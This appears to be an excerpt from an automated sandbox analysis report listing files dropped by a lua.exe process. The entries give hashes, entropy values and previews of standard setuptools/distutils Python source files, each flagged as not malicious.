Preview:	"""distutils.command.bdist..Implements the Distutils 'bdist' command (create a built [binary].distribution)."""..import os.from distutils.core import Command.from distutils.errors import *.from distutils.util import get_platform...def show_formats():. """Print list of available formats (arguments to "--format" option).. """. from distutils.fancy_getopt import FancyGetopt. formats = []. for format in bdist.format_commands:. formats.append(("formats=" + format, None,. bdist.format_command[format][1])). pretty_printer = FancyGetopt(formats). pretty_printer.print_help("List of available distribution formats:")...class bdist(Command):.. description = "create a built (binary) distribution".. user_options = [('bdist-base=', 'b',. "temporary directory for creating built distributions"),. ('plat-name=', 'p',. "platform name to embed in generated filenames ". "(

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\bdist_dumb.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4913
Entropy (8bit):	4.07772608933135
Encrypted:	false
SSDEEP:	96:EslMKqVbTo/epWN5XjBhJ6FeRcJ2DxbfsR0P+021E2:EslHAsrzH5O
MD5:	A814B2B1965589A195891B3925F23A49
SHA1:	9067E50BBB909FCAD9A7E0795772715870FF0C8C
SHA-256:	053BABF63708A69C8FECF89ABE37EC93B623125AAFC5E60EDA7A54C8F3CE7A47
SHA-512:	F103D98DE159A9C6CDE65B00FAA58992850A6F2334FA5FEB38EE8E629AAFE8CA8F0EDF36DA59DF6B0E833F17E575E8CBE9CE6CFCEA0CB3604FDE5A8A2AE75001
Malicious:	false
Preview:	"""distutils.command.bdist_dumb..Implements the Distutils 'bdist_dumb' command (create a "dumb" built.distribution -- i.e., just an archive to be unpacked under $prefix or.$exec_prefix)."""..import os.from distutils.core import Command.from distutils.util import get_platform.from distutils.dir_util import remove_tree, ensure_relative.from distutils.errors import *.from distutils.sysconfig import get_python_version.from distutils import log..class bdist_dumb(Command):.. description = "create a \"dumb\" built distribution".. user_options = [('bdist-dir=', 'd',. "temporary directory for creating the distribution"),. ('plat-name=', 'p',. "platform name to embed in generated filenames ". "(default: %s)" % get_platform()),. ('format=', 'f',. "archive format to create (tar, gztar, bztar, xztar, ". "ztar, zip)"),. ('keep-temp', 'k',.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\bdist_msi.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	35579
Entropy (8bit):	4.575343187166742
Encrypted:	false
SSDEEP:	384:yFILWCbNfE1FIx2eA/STYVB43qRUgx5CW0IlmCp+xiBNIH39GoWadXCFQyHf4hWS:yFITBhIBFRUQCM5m9G7JKMFg4a
MD5:	A6D7D6C07440C6EF8EDAEFC5DEE25DFE
SHA1:	FCC6095ABA65C6DE244619CA0C300608FFAF3C9E
SHA-256:	11515060DFD7F84C5E78FF2099D57D25C20DB2E506B0B254CFD69F314D11B7C7
SHA-512:	906783733FC9229C4444CF548971F1FBFE214BEFB90F98129E2B611597A504D7AAF1BCCA23BBFA46097D96E8E73E64885E9421A22776FF31D8F90FCE27F829E1
Malicious:	false
Preview:	# Copyright (C) 2005, 2006 Martin von L.wis.# Licensed to PSF under a Contributor Agreement..# The bdist_wininst command proper.# based on bdist_wininst.""".Implements the bdist_msi command.."""..import os.import sys.import warnings.from distutils.core import Command.from distutils.dir_util import remove_tree.from distutils.sysconfig import get_python_version.from distutils.version import StrictVersion.from distutils.errors import DistutilsOptionError.from distutils.util import get_platform.from distutils import log.import msilib.from msilib import schema, sequence, text.from msilib import Directory, Feature, Dialog, add_data..class PyDialog(Dialog):. """Dialog class with a fixed layout: controls at the top, then a ruler,. then a list of buttons: back, next, cancel. Optionally a bitmap at the. left.""". def __init__(self, args, *kw):. """Dialog(database, name, x, y, w, h, attributes, title, first,. default, cancel, bitmap=true)""". Dialog.__init__(se

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\bdist_rpm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21537
Entropy (8bit):	4.403299764650821
Encrypted:	false
SSDEEP:	384:ncAyp8slkpQxNsZ/rosk7sFTzX2REUkWYYT5:ncAyC/roskYRzeHk1Yl
MD5:	F6F2383C0E4F35994FF20B34D7BE9707
SHA1:	35E9A086836BD1DFF16167AFE747E20E6758C692
SHA-256:	8233B0DB61A10D26DCAB46DDAB6E5C4DBFA7E875969B46D284B41A77F9A42789
SHA-512:	8A3E4FC86896828C4C246589294530B83C0E63E70F0BB1200F1CF71C7B643D21C213DB7E921378CBFAA6242D7238C2872D48A9DEDC2ACD9C8E3516701A03A2C9
Malicious:	false
Preview:	"""distutils.command.bdist_rpm..Implements the Distutils 'bdist_rpm' command (create RPM source and binary.distributions)."""..import subprocess, sys, os.from distutils.core import Command.from distutils.debug import DEBUG.from distutils.file_util import write_file.from distutils.errors import *.from distutils.sysconfig import get_python_version.from distutils import log..class bdist_rpm(Command):.. description = "create an RPM distribution".. user_options = [. ('bdist-base=', None,. "base directory for creating built distributions"),. ('rpm-base=', None,. "base directory for creating RPMs (defaults to \"rpm\" under ". "--bdist-base; must be specified for RPM 2)"),. ('dist-dir=', 'd',. "directory to put final RPM files in ". "(and .spec files if --spec-only)"),. ('python=', None,. "path to Python interpreter to hard-code in the .spec file ". "(default: \"python\")"),. ('fix-python', None,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\bdist_wininst.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16030
Entropy (8bit):	4.213897692539671
Encrypted:	false
SSDEEP:	192:+wcftNSfShLR7ju1v2TcMMcDRQkv/qJFbgSRMhoMHLzumDIeX8GqoPv52N5c:+wWtNSfCBY2plzKMh9HH2c81oPv52NG
MD5:	CEA64ABBC04473291B7E6526556CBCD1
SHA1:	D3A6FE42EE575966F0C6E3AF7949C56D615FC600
SHA-256:	88695A23E55F1251CE9DE79CCCA1D69D23796B5D3EEC831C25A5EE47599D4B77
SHA-512:	DD8D2686149A3E4C476634E07D108FCD711C6CD9919BFC2760364089A6AFC27178E7378A16528235D0380E946C2E255E97FD373899FECE6E87D4BA0FF6237B5F
Malicious:	false
Preview:	"""distutils.command.bdist_wininst..Implements the Distutils 'bdist_wininst' command: create a windows installer.exe-program."""..import os.import sys.import warnings.from distutils.core import Command.from distutils.util import get_platform.from distutils.dir_util import remove_tree.from distutils.errors import *.from distutils.sysconfig import get_python_version.from distutils import log..class bdist_wininst(Command):.. description = "create an executable installer for MS Windows".. user_options = [('bdist-dir=', None,. "temporary directory for creating the distribution"),. ('plat-name=', 'p',. "platform name to embed in generated filenames ". "(default: %s)" % get_platform()),. ('keep-temp', 'k',. "keep the pseudo-installation tree around after " +. "creating the distribution archive"),. ('target-version=', None,.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\build.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5767
Entropy (8bit):	4.321676109464748
Encrypted:	false
SSDEEP:	96:L/c3CR3jRT7/mOVdyGEOgD4Wn38/n/+J1KG4gWMvQtQ:L/c3AjJ/mOnHWM/n/+J1KG9WRtQ
MD5:	60B11BD343C4E3930DF78441B5045574
SHA1:	36347D8DCE36E0F6EEB23833B52C1D6C1EF03492
SHA-256:	D753724765005336A5AE44D9DA98740401C55850B68ED4AC37B808685F8D0B4F
SHA-512:	E1FF27DC5B4115354D5A6E77F1D6CDACFAB1FFAA13994C1A9BD14A1A21B4F35A34157C1C6193991E598A070074412086EDE3A0C2CA61BEC3365390F26423FCCC
Malicious:	false
Preview:	"""distutils.command.build..Implements the Distutils 'build' command."""..import sys, os.from distutils.core import Command.from distutils.errors import DistutilsOptionError.from distutils.util import get_platform...def show_compilers():. from distutils.ccompiler import show_compilers. show_compilers()...class build(Command):.. description = "build everything needed to install".. user_options = [. ('build-base=', 'b',. "base directory for build library"),. ('build-purelib=', None,. "build directory for platform-neutral distributions"),. ('build-platlib=', None,. "build directory for platform-specific distributions"),. ('build-lib=', None,. "build directory for all distribution (defaults to either " +. "build-purelib or build-platlib"),. ('build-scripts=', None,. "build directory for scripts"),. ('build-temp=', 't',. "temporary build directory"),. ('plat-name=', 'p',.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\build_clib.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8022
Entropy (8bit):	4.173179673941466
Encrypted:	false
SSDEEP:	96:u2BPSxjERm3N/8KMaXUlH6OLYaehQAan3fc9EAsJkXnsJkrOqrAan4ddF:u2BPjkm8XIH6OAi0A8eP
MD5:	1CB6CCEF39C800BB3BCD474077BCEF86
SHA1:	40AE72B8E5EE3B031FCE4B3446282E9C0E24FFFF
SHA-256:	6E05531E1DBC78B400D86930EBC6A602977F8FBA90057E0C4C8FB34EF00AFC9E
SHA-512:	B2F88889C8D2D01F2C852A59BAB8D38B1E271FF38138B003CED6DE593D83B08ED3AE0C8B38EDAEDB4327CF2E94D56B4F597F60930AA84D68D0B01340B7C486DF
Malicious:	false
Preview:	"""distutils.command.build_clib..Implements the Distutils 'build_clib' command, to build a C/C++ library.that is included in the module distribution and needed by an extension.module."""...# XXX this module has lots of code ripped-off quite transparently from.# build_ext.py -- not surprisingly really, as the work required to build.# a static library from a collection of C source files is not really all.# that different from what's required to build a shared object file from.# a collection of C source files. Nevertheless, I haven't done the.# necessary refactoring to account for the overlap in code between the.# two modules, mainly because a number of subtle details changed in the.# cut 'n paste. Sigh...import os.from distutils.core import Command.from distutils.errors import *.from distutils.sysconfig import customize_compiler.from distutils import log..def show_compilers():. from distutils.ccompiler import show_compilers. show_compilers()...class build_clib(Command):.. de

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\build_ext.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31685
Entropy (8bit):	4.339213723054628
Encrypted:	false
SSDEEP:	384:PRouYMg+5+yYqoi65J1KthQO6QchAu448Ocs6Nzb1gyi7lxP/QK4SDBv:PRoM5d6Qc9wgyyXIQp
MD5:	E11EDCAC35340CE0D3A9EF9FF244EE8C
SHA1:	502932758654B3542A89AF0D9C1739AEDB238DF6
SHA-256:	63F4986DDF121DCA6034F7EFDE27D59E26658D8B3570B00595E0528B6FCEDC26
SHA-512:	8FB02234E8FBEB5A85102C2DA33D090B380185E1835634BB8C730E2A1D7E25E5F48885EA6D302A5204A85D54C0E02692EBE8076B430DAB59324E90B4D53FD105
Malicious:	false
Preview:	"""distutils.command.build_ext..Implements the Distutils 'build_ext' command, for building extension.modules (currently limited to C extensions, should accommodate C++.extensions ASAP)."""..import contextlib.import os.import re.import sys.from distutils.core import Command.from distutils.errors import .from distutils.sysconfig import customize_compiler, get_python_version.from distutils.sysconfig import get_config_h_filename.from distutils.dep_util import newer_group.from distutils.extension import Extension.from distutils.util import get_platform.from distutils import log.from . import py37compat..from site import USER_BASE..# An extension name is just a dot-separated list of Python NAMEs (ie..# the same as a fully-qualified module name)..extension_name_re = re.compile \. (r'^[a-zA-Z_][a-zA-Z_0-9](\.[a-zA-Z_][a-zA-Z_0-9])$')...def show_compilers ():. from distutils.ccompiler import show_compilers. show_compilers()...class build_ext(Command):.. description = "build C/C+

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\build_py.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17190
Entropy (8bit):	4.312321528320799
Encrypted:	false
SSDEEP:	384:HZixgF9S2n+gVX0c2jMm0+pAvf3w/S9nX:HZiqS2nFX030+23A/2X
MD5:	1F0E2ED67BD67677AE125BF3FABF5A62
SHA1:	F4EF0AE6D4B5F7BC4F62ADEA9D3C76FE03ACC37C
SHA-256:	4BF365C3885913C3E7220A97E4E14C766B7E19298E84F410E1FDA3AF5B819E85
SHA-512:	456D50B8897E5F09F71120E57B9096F9E8E4E8F8D597F5D82B1994B5590BFD7A82E60028F2A8598AFB9B3BDF8181007CF32C33B7C19203AEB1A847F455555F95
Malicious:	false
Preview:	"""distutils.command.build_py..Implements the Distutils 'build_py' command."""..import os.import importlib.util.import sys.import glob..from distutils.core import Command.from distutils.errors import *.from distutils.util import convert_path, Mixin2to3.from distutils import log..class build_py (Command):.. description = "\"build\" pure Python modules (copy to build directory)".. user_options = [. ('build-lib=', 'd', "directory to \"build\" (copy) to"),. ('compile', 'c', "compile .py to .pyc"),. ('no-compile', None, "don't compile .py files [default]"),. ('optimize=', 'O',. "also compile with optimization: -O1 for \"python -O\", ". "-O2 for \"python -OO\", and -O0 to disable [default: -O0]"),. ('force', 'f', "forcibly build everything (ignore file timestamps)"),. ].. boolean_options = ['compile', 'force']. negative_opt = {'no-compile' : 'compile'}.. def initialize_options(self):. self.build_lib = None.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\build_scripts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6232
Entropy (8bit):	4.0440371496609275
Encrypted:	false
SSDEEP:	96:uZ8U3ou4zi/BIKEKKAIUP+SNc0CHVtK2XwZES6EiiD7uD2ql:uZei/JpI6o0CxgPwiD7uD2Q
MD5:	00A2834F001C6F02148185994CF79272
SHA1:	5004C225637794C9E2A6EBC2832725F09EA76D66
SHA-256:	68AC9C2493F1DCB7D9D5CBD981225AC670F62E7BD1339589FBCC64A5D81C2EC2
SHA-512:	D67FC47BDF6E1CA27EF1EB64A38EF5C96B5C5E5D2D853C99C1588C1A2404CE23371691E111925E68A634B746AD4A4332225CE1D350F5891E36A3CBECCD3334D3
Malicious:	false
Preview:	"""distutils.command.build_scripts..Implements the Distutils 'build_scripts' command."""..import os, re.from stat import ST_MODE.from distutils import sysconfig.from distutils.core import Command.from distutils.dep_util import newer.from distutils.util import convert_path, Mixin2to3.from distutils import log.import tokenize..# check if Python is called on the first line with this expression.first_line_re = re.compile(b'^#!.python[0-9.]([ \t].*)?$')..class build_scripts(Command):.. description = "\"build\" scripts (copy and fixup #! line)".. user_options = [. ('build-dir=', 'd', "directory to \"build\" (copy) to"),. ('force', 'f', "forcibly build everything (ignore file timestamps"),. ('executable=', 'e', "specify final destination interpreter path"),. ].. boolean_options = ['force']... def initialize_options(self):. self.build_dir = None. self.scripts = None. self.force = None. self.executable = None. self.out

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\check.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5637
Entropy (8bit):	4.285191332447596
Encrypted:	false
SSDEEP:	96:vr731HoqQ4T+0BUpNg76V7rGjhIRGZ6sSGMx:vlXZyacNg7WaVIVz
MD5:	BAD48DA65E88E74D2AAC41ED25489AE3
SHA1:	CE7A7BD6427593393B903D7AC7A2D72E55345696
SHA-256:	E6A0ED23BE5C719837B0022D41679A22EF32DC5477D783B8AEBF529B3E07B04A
SHA-512:	7ACB052B222AD994BD166D727F01D905D82E7AE3BAC859209A02355D01AC5B146A25EB61CABE93E1BD8319217705889A9821ABAEF1F12CD7B30DB8C89B3CE265
Malicious:	false
Preview:	"""distutils.command.check..Implements the Distutils 'check' command..""".from distutils.core import Command.from distutils.errors import DistutilsSetupError..try:. # docutils is installed. from docutils.utils import Reporter. from docutils.parsers.rst import Parser. from docutils import frontend. from docutils import nodes.. class SilentReporter(Reporter):.. def __init__(self, source, report_level, halt_level, stream=None,. debug=0, encoding='ascii', error_handler='replace'):. self.messages = []. Reporter.__init__(self, source, report_level, halt_level, stream,. debug, encoding, error_handler).. def system_message(self, level, message, children, *kwargs):. self.messages.append((level, message, children, kwargs)). return nodes.system_message(message, level=level,. type=self.levels[level],.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\clean.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2776
Entropy (8bit):	4.1827302022334845
Encrypted:	false
SSDEEP:	48:sNhKO/7uUZH7gdPJg1HkETGf+QQNVuF54Zy:EhKOiuefkKt
MD5:	32FF3E6E129A5C76454317C77F53F497
SHA1:	08B65432E0111D58A220B02DE0E4491BB426540E
SHA-256:	D930ADE3BAEEE2165933445F55F5188F96DBA6272918B3F8421C398C1B6FA7D9
SHA-512:	774455AB061E928EAACD2A95FF4EE4BB602C2D21822C842C3FF38EE95FD6561A6837B955FF22443B77A4B35D42CCCD70AEE45B94D3C90D9FD51C6E68B002B2B7
Malicious:	false
Preview:	"""distutils.command.clean..Implements the Distutils 'clean' command."""..# contributed by Bastian Kleineidam <calvin@cs.uni-sb.de>, added 2000-03-18..import os.from distutils.core import Command.from distutils.dir_util import remove_tree.from distutils import log..class clean(Command):.. description = "clean up temporary files from 'build' command". user_options = [. ('build-base=', 'b',. "base build directory (default: 'build.build-base')"),. ('build-lib=', None,. "build directory for all modules (default: 'build.build-lib')"),. ('build-temp=', 't',. "temporary build directory (default: 'build.build-temp')"),. ('build-scripts=', None,. "build directory for scripts (default: 'build.build-scripts')"),. ('bdist-base=', None,. "temporary directory for built distributions"),. ('all', 'a',. "remove all build output, not just temporary by-products"). ].. boolean_options = ['all'].. def i

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\config.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13117
Entropy (8bit):	4.343711906351378
Encrypted:	false
SSDEEP:	192:vwzvdtzOOoYYtrfkZbcIeUgQMKNcirwiOnk3O1UNXqqSSbHJzP3:vwTd5oY2r4bcIdgbswiOO9NXqq17JzP3
MD5:	779D5E6711A831155FD3EB74C9AA6A50
SHA1:	7CE46F0E8990867EBDE596C7556952EF4D3373E5
SHA-256:	D9A4E3C30DCFC23301F3E6626C27B83FB07EA86D61335827FEB257632C51CFA7
SHA-512:	7489E2DD8A53D687AD16AA638D9EA729536DB87B75510FC9427EC1CCDE280CD799D4F37BFE4C1F45D087BDD9E194EFF0D10B3E8529A02EE9B517BC43B0BF8F69
Malicious:	false
Preview:	"""distutils.command.config..Implements the Distutils 'config' command, a (mostly) empty command class.that exists mainly to be sub-classed by specific module distributions and.applications. The idea is that while every "config" command is different,.at least they're all named the same, and users always see "config" in the.list of standard commands. Also, this is a good place to put common.configure-like tasks: "try to compile this C code", or "figure out where.this header file lives".."""..import os, re..from distutils.core import Command.from distutils.errors import DistutilsExecError.from distutils.sysconfig import customize_compiler.from distutils import log..LANG_EXT = {"c": ".c", "c++": ".cxx"}..class config(Command):.. description = "prepare to build".. user_options = [. ('compiler=', None,. "specify the compiler type"),. ('cc=', None,. "specify the compiler executable"),. ('include-dirs=', 'I',. "list of directories to search

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27482
Entropy (8bit):	4.376863152403295
Encrypted:	false
SSDEEP:	384:SC4LSh6zjRtYyStONqrxQsbUsKFiaAY89OC:SC4LNjRt5LIisRKsap8IC
MD5:	7F4CDE4AD64D227578AE2FCA417BFC58
SHA1:	BC394D934D24A05D97EEDE164CFD9BE411D1FAB2
SHA-256:	A0E336AC3EE5FD28250113550E68999FCBBA0C07E2757445FF2139412DF6F01E
SHA-512:	A01E2F907F9C9036326A7DF46FF73133426189030CBD5C9C38AFC174211B88A38DF2FC30280E36237F295DB2E1FEB423E17DDFB8480F42754A1812DA2F2B696E
Malicious:	false
Preview:	"""distutils.command.install..Implements the Distutils 'install' command."""..import sys.import os..from distutils import log.from distutils.core import Command.from distutils.debug import DEBUG.from distutils.sysconfig import get_config_vars.from distutils.errors import DistutilsPlatformError.from distutils.file_util import write_file.from distutils.util import convert_path, subst_vars, change_root.from distutils.util import get_platform.from distutils.errors import DistutilsOptionError..from site import USER_BASE.from site import USER_SITE.HAS_USER_SITE = True..WINDOWS_SCHEME = {. 'purelib': '$base/Lib/site-packages',. 'platlib': '$base/Lib/site-packages',. 'headers': '$base/Include/$dist_name',. 'scripts': '$base/Scripts',. 'data' : '$base',.}..INSTALL_SCHEMES = {. 'unix_prefix': {. 'purelib': '$base/lib/python$py_version_short/site-packages',. 'platlib': '$platbase/$platlibdir/python$py_version_short/site-packages',. 'headers': '$base/includ

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install_data.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2822
Entropy (8bit):	3.920127122195026
Encrypted:	false
SSDEEP:	48:sGHzN7wQCchXTzRTddPDqqxd39skssBct:pHzSQ/95dz3Xct
MD5:	5980BF1999EBA1E8CDF2F34D9DE17366
SHA1:	6887EB868C295CBCBF28C74FC48606018E92519B
SHA-256:	62118E0308778093EA17B7A6E57034AE6A51E36CF56CB87CD28A049730F252F9
SHA-512:	354892876EFAFB96CFB22FFEA01F47A45B5545B8A2EA0DB0D8C6EC3169466CAA1F8DCC6E4DC90AFA10EE99877DE7617E00F93B941B2B26815E35E490F9211A03
Malicious:	false
Preview:	"""distutils.command.install_data..Implements the Distutils 'install_data' command, for installing.platform-independent data files."""..# contributed by Bastian Kleineidam..import os.from distutils.core import Command.from distutils.util import change_root, convert_path..class install_data(Command):.. description = "install data files".. user_options = [. ('install-dir=', 'd',. "base directory for installing data files ". "(default: installation base dir)"),. ('root=', None,. "install everything relative to this alternate root directory"),. ('force', 'f', "force installation (overwrite existing files)"),. ].. boolean_options = ['force'].. def initialize_options(self):. self.install_dir = None. self.outfiles = []. self.root = None. self.force = 0. self.data_files = self.distribution.data_files. self.warn_dir = 1.. def finalize_options(self):. self.set_undefined_options('in

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install_egg_info.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2603
Entropy (8bit):	4.6333662499940145
Encrypted:	false
SSDEEP:	48:s4wja2CFl3K0aYaAPOJpOpoc1Ke4irWnK8/PkPw/PWtde:/w+2CFNKrBAPOfOpPWK8nkPwnWtde
MD5:	26B473F94FF6DABC1B347DED880F55FC
SHA1:	F21FF5158B1CEEE52071D14DBDB64BE571615A46
SHA-256:	D245B496254C79A7648D7D197117CCA6D2857A7D3B1B0EA0CB0D551D3E4A2307
SHA-512:	32B580B42406127BA1EC13E3854C678180720C5ABF5694C07EBBC573D24C4B8DF0EC4B02C2EE1BF75750606D916A91CB43FBB2D1CF236FF4C3F56D63823A99EE
Malicious:	false
Preview:	"""distutils.command.install_egg_info..Implements the Distutils 'install_egg_info' command, for installing.a package's PKG-INFO metadata."""...from distutils.cmd import Command.from distutils import log, dir_util.import os, sys, re..class install_egg_info(Command):. """Install an .egg-info file for the package""".. description = "Install package's PKG-INFO metadata as an .egg-info file". user_options = [. ('install-dir=', 'd', "directory to install to"),. ].. def initialize_options(self):. self.install_dir = None.. def finalize_options(self):. self.set_undefined_options('install_lib',('install_dir','install_dir')). basename = "%s-%s-py%d.%d.egg-info" % (. to_filename(safe_name(self.distribution.get_name())),. to_filename(safe_version(self.distribution.get_version())),. *sys.version_info[:2]. ). self.target = os.path.join(self.install_dir, basename). self.outputs = [self.target].. def

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install_headers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1298
Entropy (8bit):	4.200076161236764
Encrypted:	false
SSDEEP:	24:HMUZEOK7ZMy0oGwZ1CeIdn56GPzgmHdG7s6SdYxE5sXUrxJ0:sUhKiBb6CeonQQ6StskrY
MD5:	0AC201C7F1FBB60492830423EF164C56
SHA1:	497130A66A1D5CB4E762CFD18224838B0A235273
SHA-256:	5D0EA27646C80DFAF59635C23B39EE55432F385A47067E9C2B45B3F6020CD9BE
SHA-512:	97BF05A7DD01AD43C2452B15BF3826CDE21B2CFEB050D73EB66A92E7405AD03A52EEF4E60288B931EBB9CF9D22B633DD3A2263613D3F964CB441D0BAB55B0D30
Malicious:	false
Preview:	"""distutils.command.install_headers..Implements the Distutils 'install_headers' command, to install C/C++ header.files to the Python include directory."""..from distutils.core import Command...# XXX force is never used.class install_headers(Command):.. description = "install C/C++ header files".. user_options = [('install-dir=', 'd',. "directory to install header files to"),. ('force', 'f',. "force installation (overwrite existing files)"),. ].. boolean_options = ['force'].. def initialize_options(self):. self.install_dir = None. self.force = 0. self.outfiles = [].. def finalize_options(self):. self.set_undefined_options('install',. ('install_headers', 'install_dir'),. ('force', 'force'))... def run(self):. headers = self.distribution.headers. if not headers:. return..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install_lib.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8397
Entropy (8bit):	4.37329731037553
Encrypted:	false
SSDEEP:	96:mXA76IW/bdrKqUHFY+yBCHnYk+QrQLg/mzmTbw+vhfkkhhIUZkSnrVXkw98R9:mwPGBx6JnYUKQvZPTnrlPY9
MD5:	FF880CC519AF5A065C15C19E6CADEBD9
SHA1:	047F374BD66514FFCC00DE2CE700C5B09C399F3E
SHA-256:	F40A1F47E30EF6502D8F0C2EBA40A9B5EA4E68910A3195B65478B2479854EC70
SHA-512:	2AF756C138019A59E8B56EDC21A0D90627F21898CBD626A69347FB054B38B857A2168C492D8C76FA1914751A1D39F05844A51C49B4CF04B4754DA756985F282D
Malicious:	false
Preview:	"""distutils.command.install_lib..Implements the Distutils 'install_lib' command.(install all Python modules)."""..import os.import importlib.util.import sys..from distutils.core import Command.from distutils.errors import DistutilsOptionError...# Extension for Python source files..PYTHON_SOURCE_EXTENSION = ".py"..class install_lib(Command):.. description = "install all Python modules (extensions and pure Python)".. # The byte-compilation options are a tad confusing. Here are the. # possible scenarios:. # 1) no compilation at all (--no-compile --no-optimize). # 2) compile .pyc only (--compile --no-optimize; default). # 3) compile .pyc and "opt-1" .pyc (--compile --optimize). # 4) compile "opt-1" .pyc only (--no-compile --optimize). # 5) compile .pyc and "opt-2" .pyc (--compile --optimize-more). # 6) compile "opt-2" .pyc only (--no-compile --optimize-more). #. # The UI for this is two options, 'compile' and 'optimize'.. # 'compile' is str

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\install_scripts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2017
Entropy (8bit):	4.319010321741773
Encrypted:	false
SSDEEP:	24:HMBodZEgQ+LWr2MsenGFAsg2n5+Tf7/tGWRMzgm+qIc/HmHdNvO0Ao25XzXLxOHI:s2KrNMFAsg8cTrFY+UGfO0yncHWxmi
MD5:	FE833BF5F7A70E09881AC5D1D4D023DD
SHA1:	FC2F19AD40ACFFB7261A257DE02BC799375D3C28
SHA-256:	FC22D4790C06251718DA48A4EDACCF327E4876D0C2AE359D52F675921946E9C9
SHA-512:	449FF7DEB0481461C82BA42545B744D5F0492F1ED5B95C845A4E26948B0088EE2302E7772B395743CF3F5825A1606A11AA3879F6B6FA073DF4A26AE8B1B7DB49
Malicious:	false
Preview:	"""distutils.command.install_scripts..Implements the Distutils 'install_scripts' command, for installing.Python scripts."""..# contributed by Bastian Kleineidam..import os.from distutils.core import Command.from distutils import log.from stat import ST_MODE...class install_scripts(Command):.. description = "install scripts (Python or otherwise)".. user_options = [. ('install-dir=', 'd', "directory to install scripts to"),. ('build-dir=','b', "build directory (where to install from)"),. ('force', 'f', "force installation (overwrite existing files)"),. ('skip-build', None, "skip the build steps"),. ].. boolean_options = ['force', 'skip-build'].. def initialize_options(self):. self.install_dir = None. self.force = 0. self.build_dir = None. self.skip_build = None.. def finalize_options(self):. self.set_undefined_options('build', ('build_scripts', 'build_dir')). self.set_undefined_options('install',.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\py37compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	671
Entropy (8bit):	4.960662782113443
Encrypted:	false
SSDEEP:	12:ky8wYf5c4hW//udCJ98YcKIdTZKuOBzypTDTcNIdTZjL2MAp0CUXtn0NH8s:kpwh4ISC/8YcKOnQzypHYNO0npN+n2cs
MD5:	874E242762B3B7BE70922B4F9A230A53
SHA1:	FC896058644CCB406524C86373D854F033D0BF35
SHA-256:	AB346186F4E286AC7F3D966DD996040B18755F73A3DB9E55A9AB737A560500AC
SHA-512:	B272344AE0596FF2CD8D098227FF52AD88F11056F65B0B9CF1A71BC5FC6179865F3A4C87C3A819E6DD338030AB4EC20D0F7D35FE0E3612252258EDED73166150
Malicious:	false
Preview:	import sys...def _pythonlib_compat():. """. On Python 3.7 and earlier, distutils would include the Python. library. See pypa/distutils#9.. """. from distutils import sysconfig. if not sysconfig.get_config_var('Py_ENABLED_SHARED'):. return.. yield 'python{}.{}{}'.format(. sys.hexversion >> 24,. (sys.hexversion >> 16) & 0xff,. sysconfig.get_config_var('ABIFLAGS'),. )...def compose(f1, f2):. return lambda args, kwargs: f1(f2(args, **kwargs))...pythonlib = (. compose(list, _pythonlib_compat). if sys.version_info < (3, 8). and sys.platform != 'darwin'. and sys.platform[:3] != 'aix'. else list.).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\command\register.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11712
Entropy (8bit):	4.296711756326322
Encrypted:	false
